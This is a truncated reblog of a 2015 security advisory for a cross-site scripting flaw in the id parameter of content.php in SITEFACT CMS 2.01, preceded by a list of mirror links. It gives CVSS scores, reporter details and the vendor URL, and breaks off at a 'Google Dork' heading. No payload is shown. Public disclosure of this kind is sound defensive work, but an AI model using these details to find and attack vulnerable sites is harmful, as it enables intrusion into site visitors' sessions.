https://itswift.wordpress.com/2015/05/24/sitefact-cms-xss/

https://www.facebook.com/pcwebsecurities/posts/695045367308050

https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02031.html

http://computerobsess.blogspot.com/2015/05/sitefact-cms-xss.html

https://webtechwire.wordpress.com/2015/05/24/sitefact-cms-xss/

http://whitehatpost.blog.163.com/blog/static/242232054201542474057982/

http://cxsecurity.com/issue/WLB-2015030073

http://seclists.org/fulldisclosure/2015/Mar/2

https://www.facebook.com/tetraph/posts/1655170311369595

https://www.bugscan.net/#!/x/21256

http://permalink.gmane.org/gmane.comp.security.oss.general/16882

http://lists.openwall.net/full-disclosure/2015/05/08/7

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1958

Web Technology Wire

sitefact_xss2

SITEFACT CMS XSS (Cross-site Scripting) Web Security Vulnerabilities

Exploit Title: SITEFACT CMS content.php? &id Parameter XSS Security Vulnerabilities

Product: SITEFACT CMS (Content Management System)

Vendor: SITEFACT

Vulnerable Versions: version 2.01

Tested Version: version 2.01

Advisory Publication: May 24, 2015

Latest Update: May 24, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

CVSS Version 2 Metrics:

Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism

Access Complexity: Medium

Authentication: Not required to exploit

Impact Type: Allows unauthorized modification

Writer and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)

Recommendation Details:

(1) Vendor & Product Description:

Vendor:

SITEFACT

Product & Vulnerable Versions:

SITEFACT

version 2.01

Vendor URL & Download:

Product can be obtained from here,

http://www.sitefact.de/index.cfm?resid=1&res=1024&sid=2&skt=2279

Google Dork:

“Powered by…

View original post 詳見內文:約401字